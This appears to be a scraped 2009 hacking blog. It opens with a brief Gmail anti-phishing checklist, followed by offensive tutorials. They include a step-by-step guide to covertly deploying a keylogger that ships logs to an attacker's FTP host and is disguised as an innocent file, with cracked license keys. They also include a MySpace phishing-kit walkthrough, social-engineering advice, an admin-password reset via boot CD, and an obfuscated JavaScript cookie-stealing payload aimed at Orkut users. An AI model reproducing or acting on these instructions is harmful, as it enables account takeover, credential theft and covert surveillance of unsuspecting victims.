Yes, this is the main thing you have to remember. Unless and until, you know the person or institute, do not give your sensitive information like userids , passwords, bank account numbers as a reply to any email. In fact, 90% emails demanding such information are meant for hacking..remember !

3. Suspicious Filters :

Check whether there are any suspicious filters not created by you. For checking ur email filters, go to Settings->Filters. If you find any such suspicious filter not created by you, delete it urgently.

4. Great offers, ads, winners :

Generally, Gmail users are deceived by emails which contain great offers, ads or declaring that u are lucky winner and you should provide listed query information to receive your cash prize. Never click or provide any information for such claiming emails.

5. Disable Forwarding and POP/IMAP :

To disable forwarding and POP/IMAP, go to Settings-> Forwarding and POP/IMAP and disable forwarding and POP/IMAP.

6. The most important :

The most important precaution which one must follow is "do not click on the link" provided in the email without knowing to which page the link will take you. I have added my personal experience of phishing and the method to determine the link target, where i received a paypal phisher, in my article Paypal phisher to hack Paypal account. One more thing, always open link given in email by typing address of site in new tab/window.

Thus, if you will follow these guidelines, i bet ur Gmail account will never be hacked by a phisher. Just remember the guidelines and prevent Gmail account from being hacked by hackers.

Enjoy HaCkInG.....

How to Install Spy Keylogger

2009-06-11T21:58:00.002-07:00

The post explains the method to install a keylogger on a computer to be hacked. A free keylogger for example Ardamax keylogger is a software which records all keystrokes on computer and thus one can obtain passwords easily and access or hack the required account. The trick is found to be working on all versions of Windows XP, Vista and even on other operating systems.

A step-by-step guide to successfully creating a deployment package, sending it, and receiving information using Ardamax Keylogger. Now, in this guide, I only use one method of receiving information, and that's an FTP. I also do not protect the files. Any suggestions and comments are appreciated.

Let's begin.

Head on over to download Ardamax keylogger:

Code:

http://www.ardamax.com/keylogger/

And scroll to the bottom. Download the free trial software.

After downloading, open the program and install it on computer to be hacked. Simple enough, right? After installing, go to wherever you installed it at, and open it. It should open at the bottom right corner of your screen, down by the time. If not, press ctrl+shift+alt+h. Now, leave that alone.

Next, go to:

http://www.theserials.com/serial/serial_ardamax.html

Download the appropriate serial which will match your software version.

Now, open it, and it should give you a name and a jumble of letters and numbers.

Go back to the Ardamax icon at the bottom right, and right-click it.

Click the "Enter Registration Key" button.

Use your serial/crack to unlock the full version. Congratulations, you are now ready to make your first deployment package.

~NOTE~

If you want to attach the keylogger to an existing file, go ahead and place that on your desktop.

~NOTE~

Again, right click the icon at the bottom-right.

Click "Remote Installation".

Click next.

Now, if you want to attach your keylogger to an existing file, tick the box that says "Append keylogger engine to.." etc etc.

If you tick it, click Browse, and select the file.

If not, continue down. The installation folder on target computer needs to remain Windows System Folder for added security, so leave it be.

Add any additional components you would like. I just leave mine as "log viewer" since all I grab are passwords from games.

From this point, click next.

Now, this part is self explanatory. I tick all of the boxes, as to hide it from everything visible, otherwise they can just see it and be like "Wtf", uninstall, etc.

Can't have that, now can we?

Click next.

For Security, do what you want. I leave all of it as-is and click next again.

Now, untick the "Check for updates" box, else it will check for updates on their computer and they will know that they are bugged.

Click next.

Tick the "Start in hidden mode" box, and leave the "Run on windows startup" as-is.

You may pick a date to self destruct, if you like. Sounds noisy, right? It simply removes itself on selected date. If not, leave it alone, and it will never self destruct.

Click next.

Tick the "Send logs every.." box, and choose how frequently you would like to recieve information that has been sent.

Select 'FTP' and de-select everything else as a delivery method.

You may choose what you want to see. I take out screenshots. Causes lag for me.

Leave log format alone.

You may choose to send logs if it exceeds a certain size, or if you want it to send no matter what, untick the box, which is what I do.

Continue on! (next.)

Now the fun part. -_-.

Head on over to:

http://phpnet.us/

Make an account, etc etc.

Save your FTP Account name and password. You'll need it in a moment.

This site will be the site that holds all information recieved by the keylogger.

When you're done, scroll down a bit.

Under "FTP Accounts", click "File Manager".

Near the top, click the "New Dir" button, and create a directory by any name you want. My favorite is "lolbeans".

Now, hold that thought. Bring the keylogger back.

In Ftp Host, put in:

ftp.phpnet.us

In "Remote Folder", put in the new directory's name you made. So, in this scenario, "lolbeans" without the "'s.

Fill in your Username and Password.

I leave Passive Mode checked because I'm not sure what it does, rofl. :[

Leave port alone as well. It's default.

Now to make sure everything is correctly done, click test. It should tell you it all went through. And to double check, you can refresh your open window. Click your "lolbeans" directory and there should be a test file in it.

Click next, if you're still alive.

Tick anything and everything you want.

Next.

If you selected screenshots to be enabled, pick how you want them delivered. Click next. If not, ignore this step.

Browse where you want the keylogger to be placed. You can also change the icon, which is nifty. If you're apologizing to a bitch ex girlfriend/boyfriend of yours, you can change the icon to a notepad and name it "Apology", and they fall for it.

Next.

This screen will go over with you everything that you have chosen. Make sure it's all correct.

Click Finish.

Now, if you appended the keylogger to something, you're going to need to put the "install" (feel free to rename it so it's not so obvious) and appended file into a .zip or .rar file.

If not, you have the simple "Install" on your desktop. Also, feel free to rename it to something like "Apology" or "OMFGFunnypicture!!!.jpg"

Upload the file or .rar/.zip somewhere, and let your target download it. They will double click it, and on their end, nothing will happen, but secretly, they have been keylogged.

Check your FTP Directory that you made as frequently as you told it to send logs, and you'll have everything you need.

Enjoy HaCkInG....

Find Other's Password With Ardamax KeyLogger

2009-06-11T21:53:00.000-07:00

Ardamax Keylogger is a keystroke recorder that captures user's activity and saves it to an encrypted log file.This log file then can be used to hack anyones email account password or any computer password. The log file can be viewed with the powerful Log Viewer. Ardamax keylogger is easy to use and install. Use this tool to find out what is happening on your computer while you are away, maintain a backup of your typed data automatically or use it to monitor your kids. Also you can use it as a monitoring device for detecting unauthorised access or one can use this tool to hack someones hotmail, gmail, yahoo, msn or other email account password. Logs can be automatically sent to your e-mail address, access to the keylogger is password protected. Besides, Ardamax Keylogger logs information about the Internet addresses the user has visited.

This invisible spy application is designed for Windows 98, ME, NT4, 2000, XP and 2003.

Keylogger Features:

* Remote Installer - creates a customized Ardamax Keylogger engine file. You can email this file to your target for remote monitoring.

* Invisible mode makes it absolutely invisible to anyone. Ardamax Keylogger is not visible in the task bar, system tray, Windows 98/2000/XP/2003/Vista Task Manager, process viewers (Process Explorer, WinTasks etc.), Start Menu and Windows Startup list.

* Email log delivery - keylogger can send you recorded logs through e-mail delivery at set times - perfect for remote monitoring!

* FTP delivery - Ardamax Keylogger can upload recorded logs through FTP delivery.

* Network delivery - sends recorded logs through via LAN.

* Clipboard logging - capture all text copied to the Windows Clipboard.

* Visual surveillance - periodically makes screenshots and stores the compressed images to log.

* Chat monitoring - Ardamax Keylogger is designed to record and monitor both sides of a conversation in following chats:
o MSN Messenger, Windows Live Messenger
o ICQ Pro, ICQ Lite
o Skype
o Windows Messenger
o Google Talk
o Yahoo Messenger
o Miranda
o QiP

* Security - allows you to protect program settings, Hidden Mode and Log file.

* Web Update - Ardamax Keylogger can check the availability of updates, download and install them automatically. Thus, the latest version of Ardamax Keylogger will always be installed on your computer.

* Application monitoring - keylogger will record the application that was in use that received the keystroke!

* Time/Date tracking - it allows you to pinpoint the exact time a window received a keystroke!

* Powerful Log Viewer - you can view and save the log as a HTML page or plain text with keylogger Log Viewer.

* Small size – Ardamax Keylogger is several times smaller than other programs with the same features. It has no additional modules and libraries, so its size is smaller and the performance is higher.

* Ardamax Keylogger fully supports Unicode characters which makes it possible to record keystrokes that include characters from Japanese, Chinese, Arabic and many other character sets.

* It records every keystroke. Captures passwords and all other invisible text.

Other Features:

* Windows 2000/XP/Vista support
* Monitors multi-user machines
* Automatic startup
* Friendly interface
* Easy to install

Download:
Code:
http://rapidshare.com/files/47779604/Setup.rar
[Note, This is the Setup.exe from their site...I just found a working Name/Key so you can have the full version]

Name: nGen 2oo6
Key: RTHUUGQVAWDFOQT

Enjoy HaCkInG.....

Phishing So Easy to Get Other's Password: Hack MySpace Just Now

2009-06-11T20:22:00.001-07:00

After informing you about the 4 popular and the best methods to hack Myspace account password as in my article How to hack myspace profile/account passwords, i will now inform you about “Myspace Phishing using Myspace Phisher” in this article. I have provided download link at end of this article to download Myspace Phisher about which i will be talking about in the article.

What do you think is the above site about?? Myspace….think it again. Its a Myspace phisher ready to steal account password.
Note: The article is for educational purpose only. I am not responsible for any action done by any reader. Any damage caused is sole responsibility of user.
Steps to use Myspace Phisher to hack myspace profile/account:

1. Download Myspace phisher from download link given at end.
2. The downloaded folder contains subfolder named “Myspace” which contains 3 files:
a. Index.html (our phisher to be sent).
b. next.php and
c. passwords.txt
Make sure you get all 3 files.
3. Now, simply upload these 3 files to a free webhost. You can use http://www.100webspace.com/ for this purpose as it is free.
4. Now, simply send index.html page (phisher) to the victim. You can use anonymous mailers for this purpose. Also, make sure that link of myspace phisher nearly matches with the corresponding original myspace page. Ask the victim to login to his myspace private account by using this page. You can make him do this by telling that his myspace account is accessed by 3rd party and to ensure his security, he should login immediately to his account and just provide myspace phisher link just below your saying. I once faced the same phisher…..was almost fallen but saved. You can even use many other myspace ways…depends on victim attitude, nature and your logic.
5. Thats it. Once, victim logins with myspace phisher, you will get password of his myspace private account.
Download Myspace Account phisher

This terminates the article over here. So, i hope you will now be able to hack myspace account/profile password using Myspace phisher. Can contact me for any help on how to hack myspace account password.

Enjoy HaCkInG…..

Hacking MySpace With Famous Four Ways

2009-06-11T20:20:00.001-07:00

The article below explains the most popular ways used to hack myspace account passwords. I came across many myspace password hacking ways- some working …some not. So, i thought of collecting all these working myspace methods/ways of hacking myspace account password in this myspace article.

I will cover 4 methods over here:
1. Myspace Phishing.
2. Keylogging
3. Social engineering
4. Hacker virus at myspace.
So, lets start…
Hack Myspace Account password
1. Myspace Phishing:
I have taken this myspace hacking method first because i think this is the most popular method/way to hack myspace private account. I studied various surveys taken on web about hacking myspace. The results of these surveys show “Phishing” as the most used method to hack myspace and to note…”Phishing is favorite method of hackers”. So, friends.. beware of Phishing. Myspace staff is working hard to avoid these phishers. Phishing not only allows you to hack myspace but also almost any email account. You have to only get the trick used to make a phisher, which i think is very easy. I learnt it without any difficulty. But, remember, this is only for educational purpose. I will not extend this topic over here as i have added more on Phishing in my article Hack Myspace account password by Myspace Phisher
2.Keylogging:
This is my second favorite, as only thing you have to do is remotely install a keylogger (if you don't have any physical access to victim computer). Keylogging becomes more easy if you have physical access to victim computer as only thing you have to do is install a keylogger and direct it to your destination so that it will send all recorded myspace account passwords to pointed destination. What a keylogger does is it records the keystrokes into a log file and then you can use this log to get required myspace password and thus can hack myspace account. You can use Ardamax keylogger or Winspy Keylogger to hack myspace account password.
3. Social engineering:
This sounds to be pretty not working at beginning. Even i was neglecting this way. But, once, i thought of using it against my friend on orkut and i got his gmail password very easily by this method. I think many of you might be knowing how what this social engg is. For newbies, social engg is method of retrieving password or answer of security question simply by quering with the victim. You have to be very careful while using this as victim must not be aware of your intention. Just ask him cautiously using your logic.
4. Hacker virus:
I was not knowing about this method used by myspace hackers at myspace until i read this article. I wasn't knowing that myspace viruses are being circulated over myspace and was considering myspace as safe. But to my surprise, i was wrong. So, friends, be cautious while surfing myspace.
So far, i found these myspace hacking methods as best and working ways to hack myspace account passwords. I never encourage hacking myspace or any email account…just wanna make you cognizant about myspace dangers online. I will appreciate your effort if you mention any other method you found great….
Enjoy HaCkInG…..

Hacking Admin Password in Computer

2009-06-11T19:58:00.000-07:00

So be ready to access Admin account ...

First you will want to download a software named WINTERNALS as an iso image at www.isohunt.com, once you done that burn it to a cd with an iso burner software.

-Once thats done you will turn the computer that you want to change the password off and when its booting up press F10, or F12, or F8 varies depending on the computer.

-You need to find the one that says BOOT DEVICE and it gives you a lot of other options like booting up from a floopy disk, but you want the one that says CDROM

-Insert the disk and press enter twice this will start the cd and it will say LOADING WINTERNALS then you will get a dialog box asking you what operating system to boot from so choose Windows sp2 and press enter

-You will notice that you get a desktop similar to windows, now go to start and look for the application named LOCKSMITH and press enter

-Now it will ask you what account to change the password

-Choose what ever account you want preferably choose the administrator account

-Now change the password, and press enter.

-And your almost done, now press start and press log off and choose restart.

-This will Restart the computer as usual now you can log on as the administrator account with the password you set.

Congrats....u've changed admin password...

Enjoy HaCkInG.....

Using Lophtcrack to crack/recover passwords....

2009-06-11T19:53:00.000-07:00

This post describes method used to crack/recover windows XP password by using Lophtcrack. Thus, it can be used to recover lost passwords or even crack administrator accounts.

Update: For cracking Windows Vista admin account click here. Even John the Ripper is a powerful password cracking tool...

Now this what m gonna share is old but still works well.
Reference: geekwithlaptop

There's a way to crack the password and it doesn't involve reformatting and reinstalling Windows. The solution is called @stake LC4 (formerly L0phtCrack), however since Symantec stopped development of L0phtcrack, I m going to let you in on a program called LC5. Just like L0phtCrack, LC5 attacks your Windows machine with a combination of dictionary and brute force attacks. LC5 can crack almost all common passwords in seconds. More advanced passwords with numbers and characters takes longer. The main purpose of the LCP program is user account passwords auditing and recovery in Windows NT/2000/XP.

How Lophtcrack works:

Windows NT, 2000 and XP passwords are stored as encrypted hashes. LC5 attacks these hashes with hundreds of passwords per minute. Eventually the correct password will be sent and then displayed to the screen.

Good intentions:
can find weak passwords within minutes. Sys admins can then change the passwords to make them more secure.
LC5 can be used to access computers of users who forget passwords.
In companies, it can be used to access computers of employees who have left the company.

Bad intentions:

Hackers can use LC5 to sniff passwords over networks.
Hackers can install this application onto a primary domaincontroller and steal hundreds of passwords within minutes.
Please note that I am not the author of this software. Be advised that if you use this software, you do so at your own risk without any warranty expresses or implied by http://rajeshhackingarticles.blogspot.com

Software License:

LCP is a freeware program. The program may be distributed under condition of saving all files contents and structure of installation package.

You can check out other posts related to password cracking:
Change Admin password...

Enjoy HaCkInG......

Orkut Hacking Tool

2009-06-11T19:43:00.001-07:00

The post was added on demand "Where to download orkut hacktool" requested by Jai Sharma.

In my post Hack Orkut account by cookie stealing, i have explained the method used by most hackers to hack orkut account password. Now, here in this post "Hack Orkut account password by Orkut Hacktool", i have explained the use of orkut hacktool to hack orkut accounts. I have even added download link at the end of post to download this orkut hacktool for hacking orkut account.

Type: Orkut Software
COMPILED By: Vivek
Published at:
FABULOUS COLLECTION OF ORKUT TOOLS
ALL TOOLS AND SCRIPTS FOR ORKUT U WILL EVER NEED
Developed by OUGIANS

It contains tools like

► Floodmachines
► Profile Maker
► Community Spammer
► Community Joiner
► Accept All & Reject all Friends
and some more tools and scripts.

Sreenshots:

Download Link:

Click Here to Download Orkut account hacktool
password:- viveksinhaanurag

Enjoy HaCkInG.....

Hacking Orkut By Stealing Cookies

2009-06-11T19:27:00.000-07:00

I have explained in my post Hack orkut account by Orkut hacktool the method used to hack orkut accounts using a orkut hacktool. This article below explains the method to hack orkut account by stealing orkut account cookies. Hacking orkut accounts has become much popular and hence i have added this article which will help you in hacking your friend's orkut account. Just ask the victim to copy the script in address bar and then you will be able to login/access /hack his orkut account. The another method for hacking orkut accounts is by means of orkut phishing (fake orkut login) which i have explained in my post Using phishing to hack accounts.

Note: My purpose is only to make u aware of what's happening around and not to teach u hacking orkut account, gmail or any account in any sort!!.

Procedure for hacking orkut account by stealing orkut cookies from mozilla firefox to hack gmail or orkut is given below.

"Hacking orkut account or Gmail" by "stealing orkut account cookies" :

The post explains how one can steal cookies to hack orkut account or gmail account. No password cracking method required.

Steps to hack gmail or orkut account password by stealing orkut cookies:-

1.Firstly you need have Mozilla firefox.
2.Download cookie editor plugin for Mozilla firefox from:

https://addons.mozilla.org/en-US/firefox/addon/573

3.You need to have two fake orkut accounts to Hack Orkut or Gmail , So that you have to receive orkut cookies to one Orkut account and other Orkut account for Advertising your Script, Well it depends on your Choice to have Two Gmail(Orkut) accounts.

Cookie Script:

javascript:nobody=replyForm;nobody.toUserId.value=33444211;
nobody.scrapText.value=document.cookie;nobody.action='scrapbook.aspx?
Action.submit';nobody.submit()

How to use orkut cookies script?

1. Replace your number "UserId.value=33444211"

How to Replace your Number
1. Go to your Orkut album
2. Right click on any Photo> Properties>55886645.jpg It will be a Eight Digit Value.
3. Now replace your value with the value in the java script.

Your script will look like.

javascript:nobody=replyForm;nobody.toUserId.value=yournumber;
nobody.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));
nobody.action='Scrapbook.aspx?Action.writeScrapBasic';nobody.submit()

2.Now send this Cookie script to the victim and ask him to paste in Address bar and Press enter.

3.You'll get his orkut account cookie in your scrap book.

4.After getting a orkut account cookie go to your orkut Home page , Then click on Tools tab and then go to cookie editor plugin( Tools--> Cookie editor)

5.click filter/refresh.look for 'orkut_state' cookie. just double click it and replace the orkut_state part with your victim's Script
put ur eight digit number in the place of (33444211).

Thats it your done with.

Logout of your orkut and login again and you'll be in your victims Homepage.

6.So remember guys...if you are having orkut account or having any other account....never use any suspicious script to prevent anyone from hacking/accessing your orkut account.

I hope you have learned how to hack orkut accounts using cookie stealing. Just the script can be used to hack orkut accounts and then access victim's orkut account. Enjoy hacking orkut.

Enjoy HaCkInG.....